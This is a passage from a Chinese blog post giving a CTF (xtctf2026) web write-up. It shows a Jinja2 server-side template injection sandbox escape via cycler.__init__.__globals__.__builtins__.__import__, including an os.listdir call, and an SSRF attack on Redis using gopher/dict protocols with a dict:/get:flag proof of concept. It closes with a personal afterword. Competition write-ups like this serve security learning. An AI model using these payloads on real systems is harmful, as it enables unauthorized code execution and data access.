class="hljs-keyword">finally</span>:<br>            sys.settrace(<span class="hljs-literal">None</span>)<br>            sys.setprofile(<span class="hljs-literal">None</span>)<br><br>        <span class="hljs-built_in">print</span>(rendered)<br>        <span class="hljs-keyword">if</span> BoleanFlag:<br>            <span class="hljs-keyword">return</span> jsonify(&#123;<span class="hljs-string">&quot;flag&quot;</span>: RealFlag&#125;)<br>        <span class="hljs-keyword">return</span> jsonify(&#123;<span class="hljs-string">&quot;status&quot;</span>: <span class="hljs-string">&quot;OK&quot;</span>&#125;)<br></code></pre></td></tr></table></figure>

<p>所以后面就只能用这些模块（因为试过了，os啥的模块都删掉或者禁掉了）</p>
<p>看到图二，分析一下危险函数</p>
<figure class="highlight autoit"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs autoit"><span class="hljs-built_in">call</span>:普通python函数调用，取函数名；c_call：C扩展模块函数调用（os/re/<span class="hljs-built_in">random</span>等）<br></code></pre></td></tr></table></figure>

<p>由此可得：</p>
<p>Jinja内置全局对象cycler，通过cycler.init.globals可以拿到对应模块全局命名空间，进而获取未被沙箱过滤的builtins与原生import，实现无过滤导入任意模块</p>
<p>通过上下拼接的方法实现沙箱逃逸，通过 Jinja2 内置上下文对象cycler绕过沙箱限制，这边一次性调用全部 11 个候选函数，无论本轮随机选中哪 5 个目标，都能全部触发</p>
<p>总之这次的逃逸核心就是：间接获取 globals → 拿到原生 import</p>
<p>整理一下链子：<code>cycler.init.globals.builtins.import</code></p>
<p>随后我们先构造一个框架，然后再让ai去填补完善</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">&#123;% <span class="hljs-built_in">set</span> b=cycler.__init__.__globals__.__builtins__ %&#125;<br>&#123;% <span class="hljs-built_in">set</span> imp=b.__import__ %&#125;<br></code></pre></td></tr></table></figure>

<p>ai：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs bash">&#123;% <span class="hljs-built_in">set</span> b=cycler.__init__.__globals__.__builtins__ %&#125;<br>&#123;% <span class="hljs-built_in">set</span> imp=b.__import__ %&#125;<br>&#123;&#123;<br>imp(<span class="hljs-string">&quot;difflib&quot;</span>).get_close_matches(<span class="hljs-string">&#x27;a&#x27;</span>,[<span class="hljs-string">&#x27;a&#x27;</span>]),<br>imp(<span class="hljs-string">&quot;textwrap&quot;</span>).dedent(<span class="hljs-string">&#x27;  test&#x27;</span>),<br>imp(<span class="hljs-string">&quot;statistics&quot;</span>).fmean([1,2]),<br>imp(<span class="hljs-string">&quot;os&quot;</span>).listdir(<span class="hljs-string">&#x27;.&#x27;</span>),<br>imp(<span class="hljs-string">&quot;re&quot;</span>).search(<span class="hljs-string">&#x27;a&#x27;</span>,<span class="hljs-string">&#x27;a&#x27;</span>),<br>imp(<span class="hljs-string">&quot;random&quot;</span>).randint(1,2),<br>imp(<span class="hljs-string">&quot;json&quot;</span>).load(imp(<span class="hljs-string">&quot;io&quot;</span>).StringIO(<span class="hljs-string">&#x27;&#123;&#125;&#x27;</span>)),<br>b.sum([1,2]),<br>imp(<span class="hljs-string">&quot;re&quot;</span>).findall(<span class="hljs-string">&#x27;a&#x27;</span>,<span class="hljs-string">&#x27;aaa&#x27;</span>),<br>imp(<span class="hljs-string">&quot;statistics&quot;</span>).mean([1,2]),<br>imp(<span class="hljs-string">&quot;random&quot;</span>).choice([1,2])<br>&#125;&#125;<br></code></pre></td></tr></table></figure>

<p>拿到flag：<br><img src="/img/xtctf2026/7.png" srcset="/img/loading.gif" lazyload></p>
<figure class="highlight subunit"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs subunit">&#123;&quot;flag&quot;:&quot;flag&#123;0c672a5e<span class="hljs-string">-34</span>b9<span class="hljs-string">-466</span>d<span class="hljs-string">-8</span>edc-baebc4e34a8b&#125;&quot;&#125;<br></code></pre></td></tr></table></figure>

<h2 id="easyssrf"><a href="#easyssrf" class="headerlink" title="easyssrf"></a>easyssrf</h2><p>这道题很牛逼</p>
<p>先讲一下我的思路(虽说没成)</p>
<p>看一下systeminfo，是redis服务</p>
<p>首先fuzz出来就是除gopher和dict协议以外所有的协议都被过滤了，并且很死</p>
<p>然后我就想着打gopher测通道，在本地写一个shell，然后直接rce的，但是config文件没权限改，然后set加get的方式不会被执行</p>
<p>所以就只能用dict读公网服务器里的flag（其实是后面吃饭的时候没事乱写payload试出来的）</p>
<p>所以最后poc：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">dict:/get:flag<br></code></pre></td></tr></table></figure>

<p><img src="/img/xtctf2026/8.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h2><p>后面的话就没啥了，只是有点气人也有点想不明白，为啥会有人拿着py后的高分还能那么理所应当的在别人面前趾高气扬，为啥就不能稍微内敛低调一点吗，我真的很想不通，也很讨厌这类人。所以吧，虽说这么讲我自己也些不足，只是在现在这种环境下可能此类情况也层出不穷，我也应该早点习惯好</p>
<p>那就这样吧，愿以后遇到更好的人，珍惜眼下的一切，尽管我也缺点百出，惹下过很多麻烦，惹毛过不少好人，但我会改变的，嗯，总有一天</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E8%B5%9B%E5%90%8Ewp/" class="category-chain-item">-赛后wp</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/wp/" class="print-no-link">#-wp</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>第二届&#34;星途杯&#34;-xtctf2026-web全解wp</div>
      <div>https://azumisaki.kdns.fr/2026/06/06/xtctf2026/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>AzumiSaki</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2026年6月6日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2026/06/07/%E6%B5%99%E6%B1%9F%E8%AD%A6%E5%AF%9F%E5%AD%A6%E9%99%A2%E7%AC%AC%E4%B9%9D%E5%B1%8A%E4%BF%A1%E6%81%AF%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E7%AB%9E%E8%B5%9B/" title="浙江警察学院第九届信息网络安全竞赛-web全解wp">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">浙江警察学院第九届信息网络安全竞赛-web全解wp</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2026/06/01/0xgame2025/" title="0xgame2025-Week3 Web全解复现">
                        <span class="hidden-mobile">0xgame2025-Week3 Web全解复现</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
<!-- hexo injector body_end start -->
  <div id="corner-cat" aria-hidden="true">
    <div class="cat-svg-wrap">
      <svg class="cat-svg" viewBox="0 0 140 90" xmlns="http://www.w3.org/2000/svg">
        <g class="cat-tail">
          <path d="M112 54 C128 42, 132 30, 122 18 C136 24, 138 42, 126 56"
                fill="none" stroke="currentColor" stroke-width="6" stroke-linecap="round"/>
        </g>

        <g class="cat-body-main">
          <ellipse cx="72" cy="52" rx="34" ry="22" fill="currentColor" opacity="0.16"/>
          <ellipse cx="70" cy="48" rx="30" ry="20" fill="currentColor"/>
          <circle cx="42" cy="42" r="16" fill="currentColor"/>

          <path d="M31 31 L36 18 L43 31 Z" fill="currentColor"/>
          <path d="M41 31 L48 18 L52 32 Z" fill="currentColor"/>

          <path d="M35 42 h4" class="cat-eye left-eye"/>
          <path d="M45 42 h4" class="cat-eye right-eye"/>

          <circle cx="41.5" cy="46.5" r="1.2" fill="#f6c2d8"/>
          <path d="M39 49 Q41.5 51 44 49" class="cat-mouth"/>

          <path d="M28 46 h-10" class="cat-whisker"/>
          <path d="M28 49 h-9" class="cat-whisker"/>
          <path d="M55 46 h10" class="cat-whisker"/>
          <path d="M55 49 h9" class="cat-whisker"/>

          <g class="cat-legs">
            <path d="M56 63 v12" class="cat-leg"/>
            <path d="M68 65 v12" class="cat-leg"/>
            <path d="M82 65 v12" class="cat-leg"/>
            <path d="M94 63 v12" class="cat-leg"/>
          </g>
        </g>
      </svg>
    </div>
  </div>

  <div class="anime-footer-wrap">
    <div class="anime-footer">
      <div class="footer-line">
        <span id="runtime"></span>
      </div>
      <div class="footer-line footer-statistics" data-site-hosts="azumisaki.kdns.fr,azumisaki.github.io">
        <span id="busuanzi_container_site_uv">
          总访客 <strong id="busuanzi_value_site_uv">711</strong> 人
        </span>
        <span id="busuanzi_container_site_pv">
          <span class="divider" aria-hidden="true">·</span>
          总访问 <strong id="busuanzi_value_site_pv">1503</strong> 次
        </span>
      </div>
      <div class="footer-line typing" id="footer-typing"></div>
      <div class="footer-line small">
        © 2026 AzumiSaki · Powered by Hexo & Fluid
      </div>
    </div>
  </div>

  <script src="/js/navbar-hide.js"></script>
  <script src="/js/footer.js?v=mq825j7q"></script>
  <script src="/js/corner-cat.js"></script>
  <!-- hexo injector body_end end --></body>
</html>
